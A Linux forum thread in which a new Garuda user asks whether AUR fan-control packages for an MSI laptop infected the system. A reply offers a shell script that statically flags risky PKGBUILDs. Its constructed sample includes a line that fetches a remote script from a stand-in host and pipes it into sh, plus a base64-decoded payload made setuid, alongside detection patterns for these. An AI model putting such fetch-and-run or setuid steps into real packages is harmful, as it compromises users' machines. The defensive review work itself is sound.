AUR viruses?

Hi Everyone,
Relatively new Linux user here - definitely new in terms of using Linux as my daily driver (though I dual boot as I need some Windows software).

The age old story
Boy meets AUR
AUR tempts boy
Boy installs software from AUR
Boy gets worried that he may have caught something from AUR.

My laptop is pretty old and one of the fans is on the way out and cannot be found. I have tried various solutions to view and control the fans on this MSI laptop but none worked. I then came across:

MControlCenter - downloaded the latest version 4 from the GitHub page (GitHub - dmitry-s93/MControlCenter: An application that allows you to change the settings of MSI laptops running Linux) and installed it following the instructions on GitHub.

ISW / Ice-Sealed Wyvern (installed from AUR both the isw and the isw-git version)

msi-ec-git 1-1 - GitHub - BeardOverflow/msi-ec

I then became aware that the AUR can be dangerous if you don't know what you are doing, and I clearly didn't.

What I then did:
Uninstalled isw
Uninstalled MControlCenter

Ran Snapper Tools and rolled back to before I installed those things.

MControlCenter - As I had downloaded MControlCenter, I ran the individual files through VirusTotal and looked at the behaviour analysis, and no IP connections were made. I therefore assume this is safe to use?

isw - couldn't access any download for this, so couldn't run it through VirusTotal.

Open Freeze Center v3.2.1 - I downloaded this and ran it through VirusTotal and, whilst clean in the behavioural sandbox, it was connecting to a load of different IP addresses (however, I had got a little wiser by this point and hadn't installed it, only extracted it from its archive).

Using Wireshark I couldn't see any of the IPs that Open Freeze Center had connected to in the sandbox being connected to (other than 2 which are also present on my Win10 install, so I assume required).

I updated and ran ClamTK on my home folder and then on my root folders as well, including those I had to access as root. I had a load of PUPs and detections related to my Windows games installed under Lutris, but that's all.

My questions:
Does anyone have experience of any of the software I have mentioned above, and would they be able to comment on whether it is safe?

Is there a way of identifying if my system is infected, or should I be happy with Clam's results?

Thanks for getting this far, and for your responses...
G

System:
Kernel: 6.2.2-zen1-1-zen arch: x86_64 bits: 64 compiler: gcc v: 12.2.1
parameters: BOOT_IMAGE=/@/boot/vmlinuz-linux-zen
root=UUID=a0f6233f-dfa0-43e2-824a-c73b38da9d9b rw rootflags=subvol=@
quiet quiet splash rd.udev.log_priority=3 vt.global_cursor_default=0
loglevel=3 ibt=off
Desktop: KDE Plasma v: 5.27.2 tk: Qt v: 5.15.8 wm: kwin_x11 dm: SDDM
Distro: Garuda Linux base: Arch Linux
Machine:
Type: Laptop System: Micro-Star product: GE62 6QF v: REV:1.0
serial: <filter> Chassis: type: 10 serial: N/A
Mobo: Micro-Star model: MS-16J4 v: REV:0.A serial: <filter>
UEFI: American Megatrends v: E16J4IMS.117 date: 01/18/2018
Battery:
ID-1: BAT1 charge: 39.0 Wh (97.5%) condition: 40.0/53.4 Wh (74.8%)
volts: 12.2 min: 10.9 model: MSI BIF0_9 type: Li-ion serial: N/A
status: not charging
CPU:
Info: model: Intel Core i7-6700HQ socket: U3E1 bits: 64 type: MT MCP
arch: Skylake-S gen: core 6 level: v3 note: check built: 2015
process: Intel 14nm family: 6 model-id: 0x5E (94) stepping: 3
microcode: 0xF0
Topology: cpus: 1x cores: 4 tpc: 2 threads: 8 smt: enabled cache:
L1: 256 KiB desc: d-4x32 KiB; i-4x32 KiB L2: 1024 KiB desc: 4x256 KiB
L3: 6 MiB desc: 1x6 MiB
Speed (MHz): avg: 2799 high: 2801 min/max: 800/3500 base/boost: 3100/8300
scaling: driver: intel_pstate governor: powersave volts: 1.2 V
ext-clock: 100 MHz cores: 1: 2800 2: 2800 3: 2800 4: 2800 5: 2801 6: 2800
7: 2797 8: 2798 bogomips: 41599
Flags: avx avx2 ht lm nx pae sse sse2 sse3 sse4_1 sse4_2 ssse3 vmx
Vulnerabilities: <filter>
Graphics:
Device-1: Intel HD Graphics 530 vendor: Micro-Star MSI driver: i915
v: kernel arch: Gen-9 process: Intel 14n built: 2015-16 ports:
active: HDMI-A-1,HDMI-A-2 off: eDP-1 empty: DP-1 bus-ID: 00:02.0
chip-ID: 8086:191b class-ID: 0300
Device-2: NVIDIA GM204M [GeForce GTX 960 OEM / 970M]
vendor: Micro-Star MSI driver: nvidia v: 525.89.02
alternate: nouveau,nvidia_drm non-free: 525.xx+
status: current (as of 2023-02) arch: Maxwell code: GMxxx
process: TSMC 28nm built: 2014-19 pcie: gen: 3 speed: 8 GT/s lanes: 16
bus-ID: 01:00.0 chip-ID: 10de:13d8 class-ID: 0302
Display: x11 server: X.Org v: 21.1.7 with: Xwayland v: 22.1.8
compositor: kwin_x11 driver: X: loaded: modesetting,nvidia dri: iris
gpu: i915 display-ID: :0 screens: 1
Screen-1: 0 s-res: 3840x1080 s-dpi: 75 s-size: 1301x366mm (51.22x14.41")
s-diag: 1352mm (53.21")
Monitor-1: HDMI-A-1 mapped: HDMI-1-1 pos: primary,left model: Asus VE278
serial: <filter> built: 2014 res: 1920x1080 hz: 60 dpi: 82 gamma: 1.2
size: 598x336mm (23.54x13.23") diag: 686mm (27") ratio: 16:9 modes:
max: 1920x1080 min: 720x400
Monitor-2: HDMI-A-2 mapped: HDMI-1-2 pos: right model: Asus VE278
serial: <filter> built: 2014 res: 1920x1080 hz: 60 dpi: 82 gamma: 1.2
size: 598x336mm (23.54x13.23") diag: 686mm (27") ratio: 16:9 modes:
max: 1920x1080 min: 720x400
Monitor-3: eDP-1 mapped: eDP-1-1 note: disabled model: LG Display 0x046f
built: 2014 res: 1920x1080 dpi: 142 gamma: 1.2 size: 344x194mm (13.54x7.64")
diag: 395mm (15.5") ratio: 16:9 modes: 1920x1080
API: OpenGL v: 4.6.0 NVIDIA 525.89.02 renderer: NVIDIA GeForce GTX
970M/PCIe/SSE2 direct-render: Yes
Audio:
Device-1: Intel 100 Series/C230 Series Family HD Audio
vendor: Micro-Star MSI driver: snd_hda_intel bus-ID: 2-4:2 v: kernel
chip-ID: 1235:8202 alternate: snd_soc_avs class-ID: 0102 bus-ID: 00:1f.3
chip-ID: 8086:a170 class-ID: 0403
Device-2: Focusrite-Novation Focusrite Scarlett 2i2 2nd Gen type: USB
driver: snd-usb-audio
Sound API: ALSA v: k6.2.2-zen1-1-zen running: yes
Sound Interface: sndio v: N/A running: no
Sound Server-1: PulseAudio v: 16.1 running: no
Sound Server-2: PipeWire v: 0.3.66 running: yes
Network:
Device-1: Intel Wireless 3165 driver: iwlwifi v: kernel pcie: gen: 1
speed: 2.5 GT/s lanes: 1 bus-ID: 02:00.0 chip-ID: 8086:3165 class-ID: 0280
IF: wlp2s0 state: down mac: <filter>
Device-2: Qualcomm Atheros Killer E2400 Gigabit Ethernet
vendor: Micro-Star MSI driver: alx v: kernel pcie: gen: 1 speed: 2.5 GT/s
lanes: 1 port: d000 bus-ID: 03:00.0 chip-ID: 1969:e0a1 class-ID: 0200
IF: enp3s0 state: up speed: 1000 Mbps duplex: full mac: <filter>
IF-ID-1: anbox0 state: down mac: <filter>
Bluetooth:
Device-1: Intel Bluetooth wireless interface type: USB driver: btusb v: 0.8
bus-ID: 2-10:5 chip-ID: 8087:0a2a class-ID: e001
Report: bt-adapter note: tool can't run ID: hci0 rfk-id: 1 state: down
bt-service: disabled rfk-block: hardware: no software: no address: N/A
Drives:
Local Storage: total: 2.75 TiB used: 1.5 TiB (54.5%)
ID-1: /dev/nvme0n1 maj-min: 259:0 vendor: Sabrent model: N/A
size: 953.87 GiB block-size: physical: 512 B logical: 512 B speed: 31.6 Gb/s
lanes: 4 type: SSD serial: <filter> rev: RKT303.3 temp: 31.9 C scheme: GPT
SMART: yes health: PASSED on: 260d 17h cycles: 3,347
read-units: 72,987,805 [37.3 TB] written-units: 61,169,151 [31.3 TB]
ID-2: /dev/sda maj-min: 8:0 vendor: Crucial model: CT2000MX500SSD1
family: Micron Client SSDs size: 1.82 TiB block-size: physical: 4096 B
logical: 512 B sata: 3.3 speed: 6.0 Gb/s type: SSD serial: <filter>
rev: 033 temp: 42 C scheme: GPT
SMART: yes state: enabled health: PASSED on: 158d 23h cycles: 2237
written: 20.28 TiB
Partition:
ID-1: / raw-size: 934.98 GiB size: 934.98 GiB (100.00%)
used: 373.28 GiB (39.9%) fs: btrfs block-size: 4096 B dev: /dev/sda2
maj-min: 8:2
ID-2: /boot/efi raw-size: 512 MiB size: 511 MiB (99.80%)
used: 7.9 MiB (1.5%) fs: vfat block-size: 512 B dev: /dev/sda1 maj-min: 8:1
ID-3: /home raw-size: 934.98 GiB size: 934.98 GiB (100.00%)
used: 373.28 GiB (39.9%) fs: btrfs block-size: 4096 B dev: /dev/sda2
maj-min: 8:2
ID-4: /var/log raw-size: 934.98 GiB size: 934.98 GiB (100.00%)
used: 373.28 GiB (39.9%) fs: btrfs block-size: 4096 B dev: /dev/sda2
maj-min: 8:2
ID-5: /var/tmp raw-size: 934.98 GiB size: 934.98 GiB (100.00%)
used: 373.28 GiB (39.9%) fs: btrfs block-size: 4096 B dev: /dev/sda2
maj-min: 8:2
Swap:
Kernel: swappiness: 133 (default 60) cache-pressure: 100 (default)
ID-1: swap-1 type: zram size: 15.5 GiB used: 109 MiB (0.7%) priority: 100
dev: /dev/zram0
Sensors:
System Temperatures: cpu: 63.0 C pch: 68.5 C mobo: N/A gpu: nvidia
temp: 61 C
Fan Speeds (RPM): N/A
Info:
Processes: 337 Uptime: 42m wakeups: 2 Memory: 15.5 GiB
used: 6.01 GiB (38.8%) Init: systemd v: 253 default: graphical
tool: systemctl Compilers: gcc: 12.2.1 Packages: pm: pacman pkgs: 2136
libs: 578 tools: gnome-software,octopi,pamac,paru Shell: garuda-inxi (sudo)
default: Bash v: 5.1.16 running-in: konsole inxi: 3.3.25
Garuda (2.6.15-1):
System install date:     2023-02-18
Last full system update: 2023-03-11 ↻
Is partially upgraded:   No
Relevant software:       snapper NetworkManager mkinitcpio nvidia-dkms
Windows dual boot:       Yes
Failed units:            anbox-container-manager.service systemd-networkd-wait-online.service

It’s good to be cautious with AUR packages. How far you should take it is really up to you, and depends on what you perceive your threat model to be.

Reviewing the PKGBUILD before installing an AUR package is your best bet for staying safe with this resource. This is from another forum but I think it is well-stated advice and worth a read: AUR PKGBUILDs - #18 by Kresimir - Newbie - EndeavourOS

Again, this is up to you but I would say yes. If anything, ClamAV is known for being overly aggressive with flagging threats; many people report getting more false positives than actual threats.

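To make the "review the PKGBUILD" advice concrete, here is an added example of a first-pass static check you can run on a PKGBUILD before calling makepkg on it. This is example code written for this thread; it is not from the AUR tooling, Garuda, or any of the projects named in the post. The two sample PKGBUILDs inside it are constructed for the demo and are not real AUR packages, and the list of patterns it flags is an assumption about what is worth a closer look, not a complete rule set. A clean result from it is where your manual read starts, not where it ends.

```shell
#!/bin/sh
# Added example for this thread, not code from the AUR, Garuda, or any project
# named above. A first-pass static review of a PKGBUILD before running makepkg:
# it flags what a human reviewer looks for (unverified sources, code fetched or
# decoded at build time, actions against the live system) so you know where to
# read closely. The pattern list is an assumption about what is worth flagging,
# not an exhaustive rule set; the two sample PKGBUILDs are constructed.
#
# Fetch the real thing with:  git clone https://aur.archlinux.org/<pkg>.git
# then also read `git log -p PKGBUILD` there to see what changed since the
# last version you trusted.

# review_pkgbuild FILE: prints one finding per line, returns 1 if any WARN.
review_pkgbuild() {
    file="$1"
    warns=0

    # 1. Unpinned sources. 'SKIP' turns off checksum verification; it is normal
    #    for VCS sources (git+...), where you vet the upstream repo instead.
    if grep -q "'SKIP'" "$file"; then
        if grep -Eq 'source=.*(git|hg|svn|bzr)[+]' "$file"; then
            echo "NOTE: checksum SKIP on a VCS source; verify the upstream repository instead"
        else
            echo "WARN: checksum SKIP on a non-VCS source; the download is not verified"
            warns=$((warns + 1))
        fi
    fi

    # 2. Remote script piped into a shell: bypasses the checksums entirely.
    if grep -Eq '(curl|wget)[^|]*[|][[:space:]]*(sudo[[:space:]]+)?(ba)?sh([^a-zA-Z]|$)' "$file"; then
        echo "WARN: remote script piped into a shell"
        warns=$((warns + 1))
    fi

    # 3. Obfuscation: decoding a blob or eval'ing a string at build time.
    if grep -Eq 'base64[[:space:]]+(-d|--decode)|(^|[;|&[:space:]])eval[[:space:]]' "$file"; then
        echo "WARN: base64 decode or eval in the build script"
        warns=$((warns + 1))
    fi

    # 4. Touching the live system. A PKGBUILD should only write under $pkgdir;
    #    install-time actions belong in a .install file, never behind sudo.
    if grep -Eq '(^|[^a-zA-Z_-])(sudo|doas|su|systemctl)([[:space:]]|$)' "$file"; then
        echo "WARN: sudo/doas/su/systemctl used inside the PKGBUILD"
        warns=$((warns + 1))
    fi

    # 5. Setuid/setgid bits on shipped files (chmod u+s, chmod 4755, ...).
    if grep -Eq 'chmod[[:space:]]+([ugoa]*[+]s|[0-9]*[2-7][0-7]{3}([^0-7]|$))' "$file"; then
        echo "WARN: setuid/setgid bit set on a file"
        warns=$((warns + 1))
    fi

    if [ "$warns" -eq 0 ]; then
        echo "OK: no findings (still read the whole file)"
        return 0
    fi
    echo "$warns finding(s); read the PKGBUILD before building"
    return 1
}

# Constructed samples (not real AUR packages) for the demo: one clean package
# and one that does everything the checks above look for.
write_samples() {
    dir="$1"
    cat > "$dir/pkgbuild_ok" <<'EOF'
pkgname=demo-tool
pkgver=1.0
pkgrel=1
source=("https://example.invalid/$pkgname-$pkgver.tar.gz")
sha256sums=('e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855')
build() { cd "$pkgname-$pkgver"; make; }
package() { cd "$pkgname-$pkgver"; make DESTDIR="$pkgdir" install; }
EOF
    cat > "$dir/pkgbuild_bad" <<'EOF'
pkgname=demo-tool-git
pkgver=r10.abcdef0
pkgrel=1
source=("git+https://example.invalid/demo-tool.git")
sha256sums=('SKIP')
build() { curl -s https://example.invalid/setup.sh | sh; }
package() { echo cGF5bG9hZA== | base64 -d > /tmp/x; sudo chmod 4755 /tmp/x; }
EOF
}

# Stand-alone use:  sh review_pkgbuild.sh /path/to/PKGBUILD   (exit 1 on findings)
#                   sh review_pkgbuild.sh --demo               (reviews the two samples)
case "${1:-}" in
    --demo)
        tmp=$(mktemp -d); write_samples "$tmp"
        for f in ok bad; do echo "== pkgbuild_$f"; review_pkgbuild "$tmp/pkgbuild_$f" || true; done
        rm -rf "$tmp" ;;
    "") ;;
    *) review_pkgbuild "$1" ;;
esac
```

The constructed "bad" sample trips four of the five checks (the SKIP checksum is only a NOTE because its source is a git+ URL, which is the normal case for -git packages such as isw-git and msi-ec-git); the clean sample trips none. Treat each WARN as a place to read the surrounding lines by hand rather than as a verdict, and remember that a PKGBUILD can also pull in an arbitrary tarball from a URL that looks nothing like the project's own, so check where source= actually points too.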

Hey there, thanks for your reply and for putting my mind at rest.
G